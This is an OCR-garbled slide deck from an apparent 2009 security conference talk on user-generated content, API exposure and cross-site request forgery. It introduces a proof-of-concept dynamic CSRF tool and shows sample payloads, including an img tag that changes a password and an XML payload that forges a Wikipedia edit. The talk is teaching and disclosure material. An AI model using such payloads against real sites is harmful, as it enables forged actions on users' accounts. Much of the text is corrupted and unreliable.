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CITIZen: HQTHQfl HQHIGL 

Senior Consultant - Idea InfoSec 

Associate Prof @UAT, Hexagon Security Group 

23 rd Degree Mason, LavaRolling Enthusiast 



cmzeii: SHDUn houba 

Principal Consultant - FishNet Security 
Douchebag with microphone, self-styled Wikipedian 

Shot a man in Reno just to watch him die 
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* Navel gazing and rants 

* Democratization of misinformation 

* Trust, integration, and shared exposure 

* Features arms race, emerging attack surface 

* Actual information and content 

* A nifty (we think) approach to an old bug 

* Tool release, ensuing demos o 1 fail 

* Stupid API tricks and multi-site mayhem 

* Sorry, you have to listen to rants first. =) 
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* User-Generated Content 

* User-driven, social, collaborative content 

* Blogs, wikis, socnets, web communities 

* Increasingly bolted onto "old" web media 

* Integrated, Aggregated, Dynamic 

* Offsite content, syndication, shared APIs 

* Aggregation points, feeds, personal portals 

* Increasing client-side logic (REST, JSON, etc) 
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* Moot is Time's person the year 

* Lulzy example. Larger problem. 

* Time: "Fen. Internet polls aren't trusted." Oh 
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* Post-MJ celebrity death hoaxes 

* Some "real" news outlets picked up. 

* i Report, u Report, you are on notice. 

* Note: Please stop Rickrolling. Please. 



thestar VV 




'III I 



v ^^nr*^ 



^m 







News 



V. A = • KJ.lI . 



Nation 

World Ifpdtto 
CfHjirti 

P-irlinrn-nni 
Cnlum n Ih1 ■ 



Pjbiif.hor= 



■ Jur*# W. .MOB MTT 2:*H:00 PM 



hlni-rHirn. I h ! 



A (HI N1] FLU 







1980s pop icon Rick Astley, 
43 3 found dead in Berlin hotel 

room 



BERLIN: Known for hira 1 9BDa pop hit Never Gonna GiVe You Up, 43- 
yaar-old RicK Aatlfijr has b-een pronaunce-d dead Tuesday. 

His- body was found at the Aingletenra H&tel n D&rhn after an an-ibulenca 

rijspcindcid 1a an cimcirgnncy c-nllfram hiK hnlnl rnnm. 
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* NYT aggregation fail 

* HTML injection article propagates HTML injection 

* Aggregation, syndication, shared exposure 



McAfee 



Mh*i ctnbn 

Trick f*yr P.#3itl 

P flbbb* CLiltdHiiT 

£h ■■ _ w 

Clr.-kt;l-=- rp K-i-Mnii 

L:*i*c-: ■:-♦ =-aI j«- r» -an 

Card 



Get Your Rebate 

^-T^r 1 of ft ■ Jt4*Jirfh lor ii Mr Jiff** i^romfitwin 



Pu rerun* EKflt-c 



Su^h fai v::i ■ KA.'* r Ge^rr 0«V fry 0iOvd.^g ih* ifAQtm$\i&h bt\&* *■?* eli4M*§ n &«**«•"■ 

PI ft li# **!•*£ E n prn-iliKI- 



E#-I&r1 Product Purchj6i;d 



D-*l* PiiKhaied 'ffofFw*: rft-Tiittyyyri 





ELDCK HDT USA 3009 




Saturday, August 1 , 2009 



T 



t ^ 




I 



■ initio. 



T COULD POSSIbLU 90 H90I19? 



Vs&t ^* 



DailyKos trolls twittering dittoheads 

* Fake economy / budget numbers 

* $3 million for replacement tires for 1992-1995 Geo Metros. 

* $750,000 for an underground tunnel connecting a middle school 
and high school in Nortn Carolina. 

* $4.7 million for a program supplying public television to K-8 
classrooms. 

* $2.3 million for a museum dedicated to the electric bass guitar. 
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The emerging socialized web 

Multi-site aggregation = Attacker ROI 
Multipoint attack surfaces, APIs, "Digg this!", etc 
(n)th-parties and shared exposure 



w 



Malware-like" legit functionality 

Silent updates, presence announcements 
Offsite links and wrapped external content 
Try blocking .js for googleapis.com. I dare you. 
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File Sharing 

A simple and safe way to share files 
directly from your computer. 

Photo Sharing 

Share your personal photos with friends 
around the world without the need to 



t a . 



'* 



Fridge 



Afun place for people to leave notes on 
your computer. 





The Lounge 



Invite your friends to a chat in The 
Lounge hosted on your computer. 




Media Player 

Access your complete home music 
library from wherever you are. 

Web Server 

Host your Web sites running from your 
own computer. 



upload them. 
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* Retrofitting the Thing of The Now 

* More FF fail. No, srsly. 
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Wocom b'WLduaL c 
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ftOQ Cliatwit 

Jabber IMw 
SGrvicG.aduttfrienc 




() 

() 







Hello, how are you doing tonight? 



[enter chafi 



in fine... 



'and you? v 

* I am not doing too bad 
What are you up to tonight? 






nothing... justchllin here at my 
room.. 



] 



^®\ 



A 



ELDCK HDT USA 3009 




Saturday, August 1 , 2009 



■V..VV 



$&> 



S* 



t ^ 



^S' 



■lllltp.i. 



Vs&t yP*. 



CXP0Sin9 yOUJISBLF 



n n in in w^Thin* 

mail F* MAfiCn hLdia SiTIS 



Orw mechanism 
far Hiqui-Etlng 
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QAUTH YAHOOf APPLICATION PLATFORM 
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INFRASTRUCTURE 




On*in*chanlifTi 

fOi" ieCMiifl'jj And 

TTMshmg data 

Li'iiO Ir.ninJ-.VL'i-. fir 
Hj-C-vr-lijc-^ig appi 



and prdilc- r-acord 
replicator- and 







1 u 


■ 1 







f..T<" 3 












>***">* 




rc-^ 



G^^* 



vj ! 



■11* 






fU^M"* 



Qpf*1ld 





ELDCK HDT USA SD09 



Saturday, August 1 , 2009 




.TfcU 


H 




1 

4 






CXP0Sin9 yOUJISBLF 



APIs are the New Hotness 

Integrate other site functions {Your tweets in my 
Facebook? Awww. . . . ) 

Hooks into fluffy clouds of amorphous love 

googleapis, amazonws, others 

Crossdomain content, sandboxing 

Two major types of APIs 

For consumption of application services 
For integration of app on another site 
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* Your app is so ugly its APIs have APIs 

* How far away from what we are using do we need to 
be? 



Application 



API 



Application 




Application 



* = WTF. Complexity breeds exposure. 
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API ps Qnon pnoxy 



Attacks anonymization via shared APIs 




Sle /Application 




Atlac^er 
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* PLQCe LIKe 1310.0.1 



Hi5 API localhost dev page. Oppsl!l 
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Namt^pucc Mlp://api.Iiij.niJT]/ (vi -.dl): 
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BOAP 
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Triangle of Death 



(Rectangl 
Death 



e| Pentagon | Hexagram | Octagon) of 
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CSRF / Session Riding / XSRF 

Well understood. Pete Watkins, 2001 
Often tough to audit for, nuanced 
Typically described as a "static" attack 
Per-user forgeries usually only via XSS 



Can be silly, bad, or really, really bad 

Our continued move to webeverything (tm) 
Classical mitigations: Referrer, POSTs, tokens 
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ou use q bflousen ron it? 



Local host 



CSRF Attacks 




Local Network Systems 
and Devices 



Web sites and 
Applications 
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CLASSICAL CSRF 




good.com 



GETS 

POSTS 

Cookies 



Sessicr to good. con 



Co-'tent on bac.corr 




bad.com 




GET or POST 

w/ Location of 

goocxom 



Example: 

<i rng s rc=" httpi/Zgood .00 rn/pol L p hp? 

poll=5&se lectio n=2" heights" 1" width=T f > 
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"DanPHIC" CSRF 



"Dynamic" CSRF. 

Per-request, per-session, per-user forgeries 
Watkins described in 2001, but no one noticed 
Samy, recent bit.ly XSS, other XSS worms 
Again, well understood as XSS side effect 

Lots of "complex" CSRF gets ignored 

POST-based, tokenized, per-user requests 

Still exploitable, but higher bar 

<img src= "/password ?newpassword=moo"> gets 
old after the 30 times or so. 
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"DanPHIC" CSRF 



w 



Dynamic" CSRF. 

We wanted to automate "complex" CSRF 
Needed more logic than just redirects / tags 
Many non-trivial CSRF are ignored 

Devs often think SOP saves them (it might) 



See also: http://securethouqhts.com/2009/07/ 
hacking-csrr-tokens-using-css-history-hack/ 
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3- Way 5 te Communication 

1. Inital Request 

2. Recirectto bad. con 

3. Custom pay load for site 




kindagood.com 



Custom Payload for site 

w/ tokens, session IDs. 

etc. 



Red rested fl ecu est 

w/referer. CSRF 

tokens, session IDs. 

etc. 




bad.com 



sortagood.com 
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ernea thg fist 



MonkeyFist: PoC Dynamic CSRFTool 

http : //hexsec.com/labs 

Small Python web server 

Creates payload / patterns based on referrer 

Automates per-request, "dynamic" CSRF 

Constructs hidden POSTs, redirects, refreshes 

Makes requests for tokens or steals from referrer 
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HP pphwpd gpTions 



<PAYLOAD n="l"> - Payload with number 
<SITE l="example.com> - Site entry w/ domain 
<METHOD> - Attack method (GET, POST, PAGE) 
<ID> - Session data to grab 
<TARGET> - URL to send attack to 
<HEADER> - Header to add to POST request 
<HEADVAL> - Value for defined header 
<POSTVAR> - POST Variable name 
<POSTVAL> - Value for defined POST variable 
< DESTINATION > - Destination for meta refresh 
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<PAYLOAD n-"l"> 

<SITE I- "exanplel. am "> 

<HETHOD>GET</HFTHOD> 

<ID>ranoV</ID> 

<ID>sess-</ID> 

<TARGET>http://exanplel. con/update. php? n 






* ses s=&arap ; nes sage- he I lo</TARGET> 



</5ITE> 
</PAYLQAD> 
<PAYLOAD n-"2"> 

<SITE I" "www.exaipleZ.can"> 

■*ETH0D>PO5T</HETHH> 

<ID>rand-=/ID> 

<ID>se55-</ID> 

■<nARGET>htt p : //www. exanplel . con/update . php</TARGET> 

-4JEADBfrU5e r - Agent</HEADB*> 

<HEADVAL>Hozilla/4.e (conpatible; HSIE 7.fl; Windows NT fi.fl)</HEADVAL> 

^EADffi>Cookie</HEADH^ 

■41EADVAL>aes s</HEADVAL> 

<P051VAfc-foo</POS7VAR> 

<POSTVAL>ba rc/P05TVAL> 

<POSTVAftH» ref oo</POSTVAR> 

<P05TVAL>i» raba rc/POSTVAL> 

<POSTVAfe- ranck/POSTVAft* 

<POS"TVAL> rand</P05™L> 
</5ITE> 
</PAYLOAD> 
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Redi'ect w/ Session Data 



He st w/ Redirect 
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pssn consuiucT 






'V*® 




Host Making POST 
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Legitimate Link Destination 




Unintended Request Destination 



Host w/ Page 
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Cross-site request forgery 
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Example and characteristics 
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NHDT yOU JUST SDH 



* MF "Dynamic" CSRF of anon Wikipedia edit 

* Requests were replayable, but unique 

* WPEdittime, WPStarttime, other session values 

* MF requested session values, hidden POST 



* We think this is pretty nifty. 
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<PAYLOAD i^"5"> 

<SITE 1= " s t louis . c raigs 1 1st . o rg "> 

■41ETH0D>FIXATI QN</MET}MO> 

<TARGET>ht t p : //en . wikipedia . o rg/w/index . php?t it le-C ros s - s ite_request_f q rge ry&amp ; act ion-s ubnit</TARGET> 

■tf)E5TINATIQN>htt p : //www. yout ube . com/wat ch7 v^ZAlNoQQaa Nw</DE5TINATI»fc- 

<IDSROhtt p : //en . wikipedia . o rg/w/index . php?t it le-C ros a - s ite_request_f a rge ry&amp ; act ion-edit </ID5RC> 

<FIXVAftH#p$tarttine</FIXVAft* 

<FIXVAL>wpSta rtt ine</FIXVAL> 

<FIXVAR>wpEditt ine</FIXVAft* 

<FIXVAL>wpEditt lne</FIXVAL> 

<FIXVAR>wpAutoSiJDia ry</FIXVAR> 

<FIXVAL>wpAutoSiJBBa ry</FIXVAL> 

<POS"TVAft»wpAnt is dsk/POSTVAR* 

<POS7VALx/POSTVAL> 

<POSTVAR>wpSect iorx/POSTVAR> 

<P0STVAL>4</P0S , TVAL> 

<P0S"TVAI*wp5c rol ltop</POSTVAR> 

<PO5TVAL>0</PQ5TVAL> 

<P0STVAft»wp5umin3 r^/POSTVAft* 

<POSTVALx/POSTVAL> 

<P0STVAftH*p5ave</P0STOW> 

<P05TVAL>Save+page</P0S , TVAL> 

<POSTVAR>wpEditTokerK/POSTVAR> 

<P05TVAL>t\</P05TVAL> 
</5ITE> 
</PAYL0AD> 
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* CSRF mitigations are well understood 

* Still, you have to LOTS of things right 

* No bolt on fixes, sorry. 

* Look at your code! Forget SOP. 

* Thanks for listening. Send bugfixes. 
Nathan's blog: http://www.neohaxor.org 
Shawn hates blogs. 
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